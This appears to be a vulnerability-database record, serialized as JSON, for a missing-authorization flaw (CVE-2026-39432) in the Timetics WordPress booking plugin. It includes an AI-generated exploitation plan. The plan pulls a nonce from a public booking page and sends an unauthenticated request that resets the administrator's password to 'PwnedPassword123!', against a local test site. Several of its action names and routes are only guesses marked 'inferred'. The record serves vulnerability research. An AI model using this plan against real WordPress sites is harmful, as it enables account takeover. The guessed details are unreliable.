[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGYxHSrKo7x1S925BsGSIIoVYp0__pXGV0JrELGw_6lE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-39432","timetics-appointment-booking-scheduling-missing-authorization","Timetics – Appointment Booking & Scheduling \u003C= 1.0.53 - Missing Authorization","The Timetics – Appointment Booking & Scheduling plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.53. This makes it possible for unauthenticated attackers to perform an unauthorized action.","timetics",null,"\u003C=1.0.53","1.0.54","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 00:00:00","2026-04-15 19:41:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0e62968e-2b0f-4ee6-8ae9-f84d5ff39dba?source=api-prod",9,[22,23,24],"assets\u002Fcss\u002Fadmin.css","assets\u002Fjs\u002Fchunk\u002F000f1d6ccd9dfcc4b29f.chunk.js","assets\u002Fjs\u002Fchunk\u002F0e2a61d8585862c26561.chunk.js","researched",false,3,"# Exploitation Research Plan: CVE-2026-39432 (Timetics Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **Timetics – Appointment Booking & Scheduling** plugin (\u003C= 1.0.53) contains a missing authorization vulnerability. Specifically, several administrative functions related to staff management and bookings are exposed via AJAX or REST API endpoints without sufficient capability checks (`current_user_can`). Because the plugin registers these actions for unauthenticated users (via `wp_ajax_nopriv_*`) or lacks a proper `permission_callback` in REST routes, an unauthenticated attacker can perform sensitive actions such as modifying staff details or passwords.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `admin-ajax.php` (AJAX) or `\u002Fwp-json\u002Ftimetics\u002Fv1\u002F` (REST API).\n- **Vulnerable Action**: `timetics_staff_password_update` (inferred based on JS chunk `0e2a61d8585862c26561.chunk.js`).\n- **Parameter**: `staff_id` (ID of the user\u002Fstaff to modify), `password` (new password), and likely a nonce.\n- **Authentication**: None Required (`PR:N`).\n- **Preconditions**: The attacker must obtain a valid security nonce, which is frequently leaked to unauthenticated users via the frontend booking page.\n\n## 3. Code Flow\n1. **Entry Point**: An unauthenticated HTTP request is made to `wp-admin\u002Fadmin-ajax.php` with `action=timetics_staff_password_update`.\n2. **Hook**: The plugin likely registers `add_action('wp_ajax_nopriv_timetics_staff_password_update', ...)` or a similar REST route in `core\u002FREST\u002FStaff.php` (inferred).\n3. **Missing Check**: The handler function (e.g., `update_staff_password`) verifies the nonce but fails to verify if the requester has administrative privileges (`manage_options`).\n4. **Sink**: The function calls `wp_set_password()` or updates the user meta\u002Fdatabase directly using the provided `staff_id`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin localizes technical parameters for its booking interface. Even unauthenticated users visiting a page with a Timetics booking form can access the nonce.\n\n1. **Identify Shortcode**: The plugin uses `[timetics]` or `[timetics_booking]` (inferred) to render the booking interface.\n2. **Setup**: Create a public page containing the shortcode.\n3. **Navigation**: Use `browser_navigate` to visit this page.\n4. **Extraction**: Use `browser_eval` to extract the nonce from the localized JS object.\n   - **Variable Name**: `timetics_params` or `timetics_admin` (inferred).\n   - **Key**: `nonce`.\n   - **Command**: `browser_eval(\"window.timetics_params?.nonce\")`.\n\n## 5. Exploitation Strategy\nWe will attempt to change the password of an existing staff member or administrator.\n\n### Step 1: Discover Target User ID\nIdentify the ID of a target user (e.g., ID 1 for the default admin).\n\n### Step 2: Obtain Nonce\nAs described in section 4, navigate to a page with the Timetics shortcode and extract the nonce.\n\n### Step 3: Send Malicious Request\nUse the `http_request` tool to trigger the password update.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=timetics_staff_password_update&nonce=[NONCE]&staff_id=1&password=PwnedPassword123!\n  ```\n  *(Note: If the endpoint is REST-based, the URL would be `\u002Fwp-json\u002Ftimetics\u002Fv1\u002Fstaff\u002Fpassword-update` with a JSON body).*\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure Timetics v1.0.53 is installed.\n2. **Create Target**: Create a \"Staff\" member in Timetics (which creates a WP User) or target the existing Admin (ID 1).\n3. **Create Public Page**:\n   ```bash\n   wp post create --post_type=page --post_title=\"Booking\" --post_status=publish --post_content='[timetics]'\n   ```\n\n## 7. Expected Results\n- **Response**: The server should return a JSON success message (e.g., `{\"success\": true, \"data\": \"Password updated successfully\"}`).\n- **Effect**: The user record for `staff_id=1` will have its password changed to `PwnedPassword123!`.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the password change using WP-CLI:\n```bash\nwp user check-password admin \"PwnedPassword123!\"\n```\nIf the command returns `Success: Password correct.`, the exploitation was successful.\n\n## 9. Alternative Approaches\nIf `timetics_staff_password_update` is not the correct action name:\n1. **Grep for Hooks**: Use `grep -r \"wp_ajax_nopriv\" wp-content\u002Fplugins\u002Ftimetics` to find all unauthenticated AJAX actions.\n2. **Check Staff Creation**: Attempt to use `timetics_create_staff` (from JS `createStaffApi`) to create a new administrative user.\n3. **Check REST Routes**: Look for `register_rest_route` in the plugin source and check for routes with `permission_callback` set to `__return_true`.\n   - Potential route: `POST \u002Fwp-json\u002Ftimetics\u002Fv1\u002Fstaff\u002Fsave`\n   - Parameters: `user_id`, `user_pass`.","gemini-3-flash-preview","2026-04-17 21:08:03","2026-04-17 21:09:44",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","1.0.53","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags\u002F1.0.53","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftimetics.1.0.53.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags\u002F1.0.54","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ftimetics.1.0.54.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ftimetics\u002Ftags"]